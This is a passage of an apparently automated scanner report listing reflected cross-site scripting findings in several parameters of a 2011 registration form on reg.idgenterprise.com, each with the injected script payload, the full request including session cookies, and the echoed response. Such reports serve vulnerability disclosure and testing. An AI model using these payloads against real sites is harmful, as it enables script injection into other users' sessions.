<input type="hidden" name="attribute['referrer']" id="attribute['referrer']" value="http://resources.cio.com/ccd/show/200006520/00457660054375CIOLJOA2UVHLH/7f4e7"><script>alert(1)</script>7be9a3d72296b117c,http://resources.cio.com/ccd/show/200006520/00457660054375CIOLJOA2UVHLH/7f4e7">
...[SNIP]...

1.9. http://reg.idgenterprise.com/reg/cio/form/submit/200006520 [codetype parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://reg.idgenterprise.com
Path:   /reg/cio/form/submit/200006520

Issue detail

The value of the codetype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1832"><script>alert(1)</script>63ee11a51c035ba38 was submitted in the codetype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /reg/cio/form/submit/200006520?codetype=ha1832"><script>alert(1)</script>63ee11a51c035ba38&pagename=pageName|Webcast:LG:16021:Oracle%20Database%20Appliance%E2%80%94Engineered%20for%20Simplicity:Download&pagetype=prop14|Webcast&segment%5B%27emailAddress%27%5D=&segment%5B%27firstName%27%5D=&segment%5B%27lastName%27%5D=&segment%5B%27company%27%5D=&segment%5B%27address1%27%5D=&segment%5B%27address2%27%5D=&segment%5B%27city%27%5D=&segment%5B%27state%27%5D=&segment%5B%27postalCode%27%5D=&segment%5B%27country%27%5D=&segment%5B%27phone%27%5D=&segment%5B%27mobile%27%5D=&segment%5B%27jobTitle%27%5D=&segment%5B%27companySize%27%5D=&segment%5B%27industry%27%5D=&segment%5B%27alert%27%5D=T&segment%5B%27optIn%27%5D=T&segment%5B%27ACD612AE-0B1C-4F42-B96F-98665CE96604%27%5D=376156&segment%5B%27ECD3F782-C70F-4AE6-80CA-CEE09570B532%27%5D=1&segment%5B%2791B9848D-F547-4A14-BF47-3C65F8145235%27%5D=7A3E05EBD67636846E364D0F613D5852&attribute%5B%27brand%27%5D=cio&attribute%5B%27leadAccelId%27%5D=aeb382d1-26b1-419c-b15b-6fa9d79185cf&attribute%5B%27referrer%27%5D=http%3A%2F%2Fresources.cio.com%2Fccd%2Fshow%2F200006520%2F00457660054375CIOLJOA2UVHLH%2F&source%5B%27pdrs%27%5D=00457660054375CIOLJOA2UVHLH HTTP/1.1
Host: reg.idgenterprise.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://reg.idgenterprise.com/reg/cio/form/200006520?SOURCE=00457660054375CIOLJOA2UVHLH&sHdr=0&hPrv=1&codetype=h&pagename=pageName|Webcast%3ALG%3A16021%3AOracle+Database+Appliance%26%23151Engineered+for+Simplicity&pagetype=prop14|Webcast&elqguid=aeb382d1-26b1-419c-b15b-6fa9d79185cf
Cookie: JSESSIONID=abcqD7WZYbXWe8eIX1gpt; NSC_sfh_tfdvsf_benjo=44593c743660; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3D00457660054375CIOLJOA2UVHLH%3B%20s_sq%3D%3B%20s_ppv%3D100%3B%20SC_LINKS%3D%3B; s_pers=%20s_pv%3DWebcast%253ALG%253A16021%253AOracle%2520Database%2520Appliance%2526%2523151Engineered%2520for%2520Simplicity%7C1321892748279%3B

Response

HTTP/1.1 200 OK
Date: Mon, 21 Nov 2011 15:57:26 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
nnCoection: close
Set-Cookie: NSC_sfh_tfdvsf_benjo=44593c743660;expires=Mon, 21-Nov-11 16:08:38 GMT;path=/;domain=reg.idgenterprise.com
Content-Length: 31867

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<form name="basic_registration" action="/reg/cio/form/submit/200006520?codetype=ha1832"><script>alert(1)</script>63ee11a51c035ba38&pagename=pageName|Webcast:LG:16021:Oracle Database Appliance......Engineered for Simplicity:Download:Download&pagetype=prop14|Webcast" method="POST">
...[SNIP]...

1.10. http://reg.idgenterprise.com/reg/cio/form/submit/200006520 [pagename parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://reg.idgenterprise.com
Path:   /reg/cio/form/submit/200006520

Issue detail

The value of the pagename request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd007"><script>alert(1)</script>1b33165dd5654e5e5 was submitted in the pagename parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /reg/cio/form/submit/200006520?codetype=h&pagename=pageName|Webcast:LG:16021:Oracle%20Database%20Appliance%E2%80%94Engineered%20for%20Simplicity:Downloadcd007"><script>alert(1)</script>1b33165dd5654e5e5&pagetype=prop14|Webcast&segment%5B%27emailAddress%27%5D=&segment%5B%27firstName%27%5D=&segment%5B%27lastName%27%5D=&segment%5B%27company%27%5D=&segment%5B%27address1%27%5D=&segment%5B%27address2%27%5D=&segment%5B%27city%27%5D=&segment%5B%27state%27%5D=&segment%5B%27postalCode%27%5D=&segment%5B%27country%27%5D=&segment%5B%27phone%27%5D=&segment%5B%27mobile%27%5D=&segment%5B%27jobTitle%27%5D=&segment%5B%27companySize%27%5D=&segment%5B%27industry%27%5D=&segment%5B%27alert%27%5D=T&segment%5B%27optIn%27%5D=T&segment%5B%27ACD612AE-0B1C-4F42-B96F-98665CE96604%27%5D=376156&segment%5B%27ECD3F782-C70F-4AE6-80CA-CEE09570B532%27%5D=1&segment%5B%2791B9848D-F547-4A14-BF47-3C65F8145235%27%5D=7A3E05EBD67636846E364D0F613D5852&attribute%5B%27brand%27%5D=cio&attribute%5B%27leadAccelId%27%5D=aeb382d1-26b1-419c-b15b-6fa9d79185cf&attribute%5B%27referrer%27%5D=http%3A%2F%2Fresources.cio.com%2Fccd%2Fshow%2F200006520%2F00457660054375CIOLJOA2UVHLH%2F&source%5B%27pdrs%27%5D=00457660054375CIOLJOA2UVHLH HTTP/1.1
Host: reg.idgenterprise.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://reg.idgenterprise.com/reg/cio/form/200006520?SOURCE=00457660054375CIOLJOA2UVHLH&sHdr=0&hPrv=1&codetype=h&pagename=pageName|Webcast%3ALG%3A16021%3AOracle+Database+Appliance%26%23151Engineered+for+Simplicity&pagetype=prop14|Webcast&elqguid=aeb382d1-26b1-419c-b15b-6fa9d79185cf
Cookie: JSESSIONID=abcqD7WZYbXWe8eIX1gpt; NSC_sfh_tfdvsf_benjo=44593c743660; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3D00457660054375CIOLJOA2UVHLH%3B%20s_sq%3D%3B%20s_ppv%3D100%3B%20SC_LINKS%3D%3B; s_pers=%20s_pv%3DWebcast%253ALG%253A16021%253AOracle%2520Database%2520Appliance%2526%2523151Engineered%2520for%2520Simplicity%7C1321892748279%3B

Response

HTTP/1.1 200 OK
Date: Mon, 21 Nov 2011 15:57:29 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
nnCoection: close
Set-Cookie: NSC_sfh_tfdvsf_benjo=44593c743660;expires=Mon, 21-Nov-11 16:08:40 GMT;path=/;domain=reg.idgenterprise.com
Content-Length: 31867

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<form name="basic_registration" action="/reg/cio/form/submit/200006520?codetype=h&pagename=pageName|Webcast:LG:16021:Oracle Database Appliance......Engineered for Simplicity:Downloadcd007"><script>alert(1)</script>1b33165dd5654e5e5:Download&pagetype=prop14|Webcast" method="POST">
...[SNIP]...

1.11. http://reg.idgenterprise.com/reg/cio/form/submit/200006520 [pagetype parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://reg.idgenterprise.com
Path:   /reg/cio/form/submit/200006520

Issue detail

The value of the pagetype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41f03"><script>alert(1)</script>6d693efd4e9d10db was submitted in the pagetype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /reg/cio/form/submit/200006520?codetype=h&pagename=pageName|Webcast:LG:16021:Oracle%20Database%20Appliance%E2%80%94Engineered%20for%20Simplicity:Download&pagetype=prop14|Webcast41f03"><script>alert(1)</script>6d693efd4e9d10db&segment%5B%27emailAddress%27%5D=&segment%5B%27firstName%27%5D=&segment%5B%27lastName%27%5D=&segment%5B%27company%27%5D=&segment%5B%27address1%27%5D=&segment%5B%27address2%27%5D=&segment%5B%27city%27%5D=&segment%5B%27state%27%5D=&segment%5B%27postalCode%27%5D=&segment%5B%27country%27%5D=&segment%5B%27phone%27%5D=&segment%5B%27mobile%27%5D=&segment%5B%27jobTitle%27%5D=&segment%5B%27companySize%27%5D=&segment%5B%27industry%27%5D=&segment%5B%27alert%27%5D=T&segment%5B%27optIn%27%5D=T&segment%5B%27ACD612AE-0B1C-4F42-B96F-98665CE96604%27%5D=376156&segment%5B%27ECD3F782-C70F-4AE6-80CA-CEE09570B532%27%5D=1&segment%5B%2791B9848D-F547-4A14-BF47-3C65F8145235%27%5D=7A3E05EBD67636846E364D0F613D5852&attribute%5B%27brand%27%5D=cio&attribute%5B%27leadAccelId%27%5D=aeb382d1-26b1-419c-b15b-6fa9d79185cf&attribute%5B%27referrer%27%5D=http%3A%2F%2Fresources.cio.com%2Fccd%2Fshow%2F200006520%2F00457660054375CIOLJOA2UVHLH%2F&source%5B%27pdrs%27%5D=00457660054375CIOLJOA2UVHLH HTTP/1.1
Host: reg.idgenterprise.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://reg.idgenterprise.com/reg/cio/form/200006520?SOURCE=00457660054375CIOLJOA2UVHLH&sHdr=0&hPrv=1&codetype=h&pagename=pageName|Webcast%3ALG%3A16021%3AOracle+Database+Appliance%26%23151Engineered+for+Simplicity&pagetype=prop14|Webcast&elqguid=aeb382d1-26b1-419c-b15b-6fa9d79185cf
Cookie: JSESSIONID=abcqD7WZYbXWe8eIX1gpt; NSC_sfh_tfdvsf_benjo=44593c743660; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3D00457660054375CIOLJOA2UVHLH%3B%20s_sq%3D%3B%20s_ppv%3D100%3B%20SC_LINKS%3D%3B; s_pers=%20s_pv%3DWebcast%253ALG%253A16021%253AOracle%2520Database%2520Appliance%2526%2523151Engineered%2520for%2520Simplicity%7C1321892748279%3B

Response

HTTP/1.1 200 OK
Date: Mon, 21 Nov 2011 15:57:31 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
nnCoection: close
Set-Cookie: NSC_sfh_tfdvsf_benjo=44593c743660;expires=Mon, 21-Nov-11 16:08:43 GMT;path=/;domain=reg.idgenterprise.com
Content-Length: 31866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
sic_registration" action="/reg/cio/form/submit/200006520?codetype=h&pagename=pageName|Webcast:LG:16021:Oracle Database Appliance......Engineered for Simplicity:Download:Download&pagetype=prop14|Webcast41f03"><script>alert(1)</script>6d693efd4e9d10db" method="POST">
...[SNIP]...

1.12. http://reg.idgenterprise.com/reg/cio/form/submit/200006520 [segment%5B%27address1%27%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://reg.idgenterprise.com
Path:   /reg/cio/form/submit/200006520

Issue detail

The value of the segment%5B%27address1%27%5D request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 417de"><script>alert(1)</script>2b50bd5c238e7e55b was submitted in the segment%5B%27address1%27%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /reg/cio/form/submit/200006520?codetype=h&pagename=pageName|Webcast:LG:16021:Oracle%20Database%20Appliance%E2%80%94Engineered%20for%20Simplicity:Download&pagetype=prop14|Webcast&segment%5B%27emailAddress%27%5D=&segment%5B%27firstName%27%5D=&segment%5B%27lastName%27%5D=&segment%5B%27company%27%5D=&segment%5B%27address1%27%5D=417de"><script>alert(1)</script>2b50bd5c238e7e55b&segment%5B%27address2%27%5D=&segment%5B%27city%27%5D=&segment%5B%27state%27%5D=&segment%5B%27postalCode%27%5D=&segment%5B%27country%27%5D=&segment%5B%27phone%27%5D=&segment%5B%27mobile%27%5D=&segment%5B%27jobTitle%27%5D=&segment%5B%27companySize%27%5D=&segment%5B%27industry%27%5D=&segment%5B%27alert%27%5D=T&segment%5B%27optIn%27%5D=T&segment%5B%27ACD612AE-0B1C-4F42-B96F-98665CE96604%27%5D=376156&segment%5B%27ECD3F782-C70F-4AE6-80CA-CEE09570B532%27%5D=1&segment%5B%2791B9848D-F547-4A14-BF47-3C65F8145235%27%5D=7A3E05EBD67636846E364D0F613D5852&attribute%5B%27brand%27%5D=cio&attribute%5B%27leadAccelId%27%5D=aeb382d1-26b1-419c-b15b-6fa9d79185cf&attribute%5B%27referrer%27%5D=http%3A%2F%2Fresources.cio.com%2Fccd%2Fshow%2F200006520%2F00457660054375CIOLJOA2UVHLH%2F&source%5B%27pdrs%27%5D=00457660054375CIOLJOA2UVHLH HTTP/1.1
Host: reg.idgenterprise.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://reg.idgenterprise.com/reg/cio/form/200006520?SOURCE=00457660054375CIOLJOA2UVHLH&sHdr=0&hPrv=1&codetype=h&pagename=pageName|Webcast%3ALG%3A16021%3AOracle+Database+Appliance%26%23151Engineered+for+Simplicity&pagetype=prop14|Webcast&elqguid=aeb382d1-26b1-419c-b15b-6fa9d79185cf
Cookie: JSESSIONID=abcqD7WZYbXWe8eIX1gpt; NSC_sfh_tfdvsf_benjo=44593c743660; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3D00457660054375CIOLJOA2UVHLH%3B%20s_sq%3D%3B%20s_ppv%3D100%3B%20SC_LINKS%3D%3B; s_pers=%20s_pv%3DWebcast%253ALG%253A16021%253AOracle%2520Database%2520Appliance%2526%2523151Engineered%2520for%2520Simplicity%7C1321892748279%3B

Response

HTTP/1.1 200 OK
Date: Mon, 21 Nov 2011 15:57:44 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
nnCoection: close
Set-Cookie: NSC_sfh_tfdvsf_benjo=44593c743660;expires=Mon, 21-Nov-11 16:08:56 GMT;path=/;domain=reg.idgenterprise.com
Content-Length: 31916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="text" name="segment['address1']" id="segment['address1']" value="417de"><script>alert(1)</script>2b50bd5c238e7e55b,417de">
...[SNIP]...

1.13. http://reg.idgenterprise.com/reg/cio/form/submit/200006520 [segment%5B%27address2%27%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://reg.idgenterprise.com
Path:   /reg/cio/form/submit/200006520

Issue detail

The value of the segment%5B%27address2%27%5D request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b5d1"><script>alert(1)</script>a00c911b36919c622 was submitted in the segment%5B%27address2%27%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /reg/cio/form/submit/200006520?codetype=h&pagename=pageName|Webcast:LG:16021:Oracle%20Database%20Appliance%E2%80%94Engineered%20for%20Simplicity:Download&pagetype=prop14|Webcast&segment%5B%27emailAddress%27%5D=&segment%5B%27firstName%27%5D=&segment%5B%27lastName%27%5D=&segment%5B%27company%27%5D=&segment%5B%27address1%27%5D=&segment%5B%27address2%27%5D=4b5d1"><script>alert(1)</script>a00c911b36919c622&segment%5B%27city%27%5D=&segment%5B%27state%27%5D=&segment%5B%27postalCode%27%5D=&segment%5B%27country%27%5D=&segment%5B%27phone%27%5D=&segment%5B%27mobile%27%5D=&segment%5B%27jobTitle%27%5D=&segment%5B%27companySize%27%5D=&segment%5B%27industry%27%5D=&segment%5B%27alert%27%5D=T&segment%5B%27optIn%27%5D=T&segment%5B%27ACD612AE-0B1C-4F42-B96F-98665CE96604%27%5D=376156&segment%5B%27ECD3F782-C70F-4AE6-80CA-CEE09570B532%27%5D=1&segment%5B%2791B9848D-F547-4A14-BF47-3C65F8145235%27%5D=7A3E05EBD67636846E364D0F613D5852&attribute%5B%27brand%27%5D=cio&attribute%5B%27leadAccelId%27%5D=aeb382d1-26b1-419c-b15b-6fa9d79185cf&attribute%5B%27referrer%27%5D=http%3A%2F%2Fresources.cio.com%2Fccd%2Fshow%2F200006520%2F00457660054375CIOLJOA2UVHLH%2F&source%5B%27pdrs%27%5D=00457660054375CIOLJOA2UVHLH HTTP/1.1
Host: reg.idgenterprise.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://reg.idgenterprise.com/reg/cio/form/200006520?SOURCE=00457660054375CIOLJOA2UVHLH&sHdr=0&hPrv=1&codetype=h&pagename=pageName|Webcast%3ALG%3A16021%3AOracle+Database+Appliance%26%23151Engineered+for+Simplicity&pagetype=prop14|Webcast&elqguid=aeb382d1-26b1-419c-b15b-6fa9d79185cf
Cookie: JSESSIONID=abcqD7WZYbXWe8eIX1gpt; NSC_sfh_tfdvsf_benjo=44593c743660; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3D00457660054375CIOLJOA2UVHLH%3B%20s_sq%3D%3B%20s_ppv%3D100%3B%20SC_LINKS%3D%3B; s_pers=%20s_pv%3DWebcast%253ALG%253A16021%253AOracle%2520Database%2520Appliance%2526%2523151Engineered%2520for%2520Simplicity%7C1321892748279%3B

Response

HTTP/1.1 200 OK
Date: Mon, 21 Nov 2011 15:57:47 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
nnCoection: close
Set-Cookie: NSC_sfh_tfdvsf_benjo=44593c743660;expires=Mon, 21-Nov-11 16:08:59 GMT;path=/;domain=reg.idgenterprise.com
Content-Length: 31916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="text" name="segment['address2']" id="segment['address2']" value="4b5d1"><script>alert(1)</script>a00c911b36919c622,4b5d1">
...[SNIP]...

1.14. http://reg.idgenterprise.com/reg/cio/form/submit/200006520 [segment%5B%27city%27%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://reg.idgenterprise.com
Path:   /reg/cio/form/submit/200006520

Issue detail

The value of the segment%5B%27city%27%5D request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f746"><script>alert(1)</script>a1fb57ad4c77efaf8 was submitted in the segment%5B%27city%27%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /reg/cio/form/submit/200006520?codetype=h&pagename=pageName|Webcast:LG:16021:Oracle%20Database%20Appliance%E2%80%94Engineered%20for%20Simplicity:Download&pagetype=prop14|Webcast&segment%5B%27emailAddress%27%5D=&segment%5B%27firstName%27%5D=&segment%5B%27lastName%27%5D=&segment%5B%27company%27%5D=&segment%5B%27address1%27%5D=&segment%5B%27address2%27%5D=&segment%5B%27city%27%5D=5f746"><script>alert(1)</script>a1fb57ad4c77efaf8&segment%5B%27state%27%5D=&segment%5B%27postalCode%27%5D=&segment%5B%27country%27%5D=&segment%5B%27phone%27%5D=&segment%5B%27mobile%27%5D=&segment%5B%27jobTitle%27%5D=&segment%5B%27companySize%27%5D=&segment%5B%27industry%27%5D=&segment%5B%27alert%27%5D=T&segment%5B%27optIn%27%5D=T&segment%5B%27ACD612AE-0B1C-4F42-B96F-98665CE96604%27%5D=376156&segment%5B%27ECD3F782-C70F-4AE6-80CA-CEE09570B532%27%5D=1&segment%5B%2791B9848D-F547-4A14-BF47-3C65F8145235%27%5D=7A3E05EBD67636846E364D0F613D5852&attribute%5B%27brand%27%5D=cio&attribute%5B%27leadAccelId%27%5D=aeb382d1-26b1-419c-b15b-6fa9d79185cf&attribute%5B%27referrer%27%5D=http%3A%2F%2Fresources.cio.com%2Fccd%2Fshow%2F200006520%2F00457660054375CIOLJOA2UVHLH%2F&source%5B%27pdrs%27%5D=00457660054375CIOLJOA2UVHLH HTTP/1.1
Host: reg.idgenterprise.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://reg.idgenterprise.com/reg/cio/form/200006520?SOURCE=00457660054375CIOLJOA2UVHLH&sHdr=0&hPrv=1&codetype=h&pagename=pageName|Webcast%3ALG%3A16021%3AOracle+Database+Appliance%26%23151Engineered+for+Simplicity&pagetype=prop14|Webcast&elqguid=aeb382d1-26b1-419c-b15b-6fa9d79185cf
Cookie: JSESSIONID=abcqD7WZYbXWe8eIX1gpt; NSC_sfh_tfdvsf_benjo=44593c743660; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3D00457660054375CIOLJOA2UVHLH%3B%20s_sq%3D%3B%20s_ppv%3D100%3B%20SC_LINKS%3D%3B; s_pers=%20s_pv%3DWebcast%253ALG%253A16021%253AOracle%2520Database%2520Appliance%2526%2523151Engineered%2520for%2520Simplicity%7C1321892748279%3B

Response

HTTP/1.1 200 OK
Date: Mon, 21 Nov 2011 15:57:49 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
nnCoection: close
Set-Cookie: NSC_sfh_tfdvsf_benjo=44593c743660;expires=Mon, 21-Nov-11 16:09:01 GMT;path=/;domain=reg.idgenterprise.com
Content-Length: 31916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="text" name="segment['city']" id="segment['city']" value="5f746"><script>alert(1)</script>a1fb57ad4c77efaf8,5f746">
...[SNIP]...

1.15. http://reg.idgenterprise.com/reg/cio/form/submit/200006520 [segment%5B%27company%27%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://reg.idgenterprise.com
Path:   /reg/cio/form/submit/200006520

Issue detail

The value of the segment%5B%27company%27%5D request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 747ab"><script>alert(1)</script>d708f0279c035b70b was submitted in the segment%5B%27company%27%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /reg/cio/form/submit/200006520?codetype=h&pagename=pageName|Webcast:LG:16021:Oracle%20Database%20Appliance%E2%80%94Engineered%20for%20Simplicity:Download&pagetype=prop14|Webcast&segment%5B%27emailAddress%27%5D=&segment%5B%27firstName%27%5D=&segment%5B%27lastName%27%5D=&segment%5B%27company%27%5D=747ab"><script>alert(1)</script>d708f0279c035b70b&segment%5B%27address1%27%5D=&segment%5B%27address2%27%5D=&segment%5B%27city%27%5D=&segment%5B%27state%27%5D=&segment%5B%27postalCode%27%5D=&segment%5B%27country%27%5D=&segment%5B%27phone%27%5D=&segment%5B%27mobile%27%5D=&segment%5B%27jobTitle%27%5D=&segment%5B%27companySize%27%5D=&segment%5B%27industry%27%5D=&segment%5B%27alert%27%5D=T&segment%5B%27optIn%27%5D=T&segment%5B%27ACD612AE-0B1C-4F42-B96F-98665CE96604%27%5D=376156&segment%5B%27ECD3F782-C70F-4AE6-80CA-CEE09570B532%27%5D=1&segment%5B%2791B9848D-F547-4A14-BF47-3C65F8145235%27%5D=7A3E05EBD67636846E364D0F613D5852&attribute%5B%27brand%27%5D=cio&attribute%5B%27leadAccelId%27%5D=aeb382d1-26b1-419c-b15b-6fa9d79185cf&attribute%5B%27referrer%27%5D=http%3A%2F%2Fresources.cio.com%2Fccd%2Fshow%2F200006520%2F00457660054375CIOLJOA2UVHLH%2F&source%5B%27pdrs%27%5D=00457660054375CIOLJOA2UVHLH HTTP/1.1
Host: reg.idgenterprise.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://reg.idgenterprise.com/reg/cio/form/200006520?SOURCE=00457660054375CIOLJOA2UVHLH&sHdr=0&hPrv=1&codetype=h&pagename=pageName|Webcast%3ALG%3A16021%3AOracle+Database+Appliance%26%23151Engineered+for+Simplicity&pagetype=prop14|Webcast&elqguid=aeb382d1-26b1-419c-b15b-6fa9d79185cf
Cookie: JSESSIONID=abcqD7WZYbXWe8eIX1gpt; NSC_sfh_tfdvsf_benjo=44593c743660; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3D00457660054375CIOLJOA2UVHLH%3B%20s_sq%3D%3B%20s_ppv%3D100%3B%20SC_LINKS%3D%3B; s_pers=%20s_pv%3DWebcast%253ALG%253A16021%253AOracle%2520Database%2520Appliance%2526%2523151Engineered%2520for%2520Simplicity%7C1321892748279%3B

Response

HTTP/1.1 200 OK
Date: Mon, 21 Nov 2011 15:57:42 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
